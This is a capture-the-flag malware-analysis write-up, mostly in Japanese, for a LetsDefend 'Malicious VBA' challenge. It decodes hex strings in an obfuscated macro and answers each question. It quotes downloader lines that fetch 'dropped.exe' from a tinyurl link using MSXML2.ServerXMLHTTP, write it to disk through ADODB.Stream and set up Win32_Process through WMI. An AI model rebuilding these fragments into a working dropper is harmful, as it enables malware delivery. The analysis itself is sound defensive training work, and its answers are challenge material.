LetsDefend Challenge Malware Analysis: Malicious VBA

• The document initiates the download of a payload after the execution, can you tell what website is hosting it?
• What is the filename of the payload (include the extension)?
• What method is it using to establish an HTTP connection between files on the malicious web server?
• What user-agent string is it using?
• What object does the attacker use to be able to read or write text and binary files?
• What is the object the attacker uses for WMI execution? Possibly they are using this to hide the suspicious application running in the background.

The document initiates the download of a payload after the execution, can you tell what website is hosting it?

今回与えられたファイルはVBAのテキストファイルだがolevbaで解析できる．

実際のコードは分かりづらいが，ちらほらhexから文字列に変換できそうなものがある．

先ほどのolevbaの解析から見えたhttps://から始まる部分に関連するものが答えになりそうだ．

# コードではこの部分．
vxedylctlyqvkl = hgmneqolwgxg("68747470733a2f2f74696e") & hgmneqolwgxg("7975726c2e636f6d2f67327a3267683666")

68747470733a2f2f74696e7975726c2e636f6d2f67327a3267683666
-> https://tinyurl.com/g2z2gh6f

A: https://tinyurl.com/g2z2gh6f

What is the filename of the payload (include the extension)?

ダウンロードされたファイル名は近くにありそうだ．

yxxqowke = hgmneqolwgxg("64726f") & hgmneqolwgxg("707065642e657865")

64726f707065642e657865
-> dropped.exe

A: dropped.exe

What method is it using to establish an HTTP connection between files on the malicious web server?

アクセス先の前後あたりか．

Set yqlcangepvrccrx = CreateObject(hgmneqolwgxg("4d53584d4c322e") & hgmneqolwgxg("536572766572584d4c485454502e362e30"))

4d53584d4c322e536572766572584d4c485454502e362e30
-> MSXML2.ServerXMLHTTP.6.0

MSXML2.ServerXMLHTTP.6.0を使えば，vbaでwebアクセスができると．
authentication - Login into website using MSXML2.XMLHTTP instead of InternetExplorer.Application with VBA - Stack Overflow

A: MSXML2.ServerXMLHTTP

What user-agent string is it using?

setRequestHeaderという文字列が見えたのでここら辺にあるハズだ．

yqlcangepvrccrx.setRequestHeader hgmneqolwgxg("557365") & hgmneqolwgxg("722d4167656e74"), hgmneqolwgxg("4d6f7a696c6c612f342e302028636f6d7061") & hgmneqolwgxg("7469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")

557365722d4167656e744d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029
-> User-AgentMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

A: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

What object does the attacker use to be able to read or write text and binary files?

先ほどのアクセス先を確認していそうな部分があった．

tmffoscpfdripcxpd.Write yqlcangepvrccrx.ResponseBody

tmffoscpfdripcxpdはどういうふうに定義されているのかというと

Set tmffoscpfdripcxpd = CreateObject(hgmneqolwgxg("41444f") & hgmneqolwgxg("44422e53747265616d"))

41444f44422e53747265616d
-> ADODB.Stream

Stream オブジェクト (ADO) | Microsoft Learn
これで見ていそうだ．
A: ADODB.Stream

What is the object the attacker uses for WMI execution? Possibly they are using this to hide the suspicious application running in the background.

olevbaの解析で見えていたwinmgmtが怪しい．
Winmgmt - Win32 apps | Microsoft Learn

Set jcjvmxzi = GetObject(lylhbzknnnzm("77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57") & lylhbzknnnzm("696e33325f50726f63657373"))

77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f50726f63657373
-> winmgmts:\\.\root\cimv2:Win32_Process

A: winmgmts:\.\root\cimv2:Win32_Process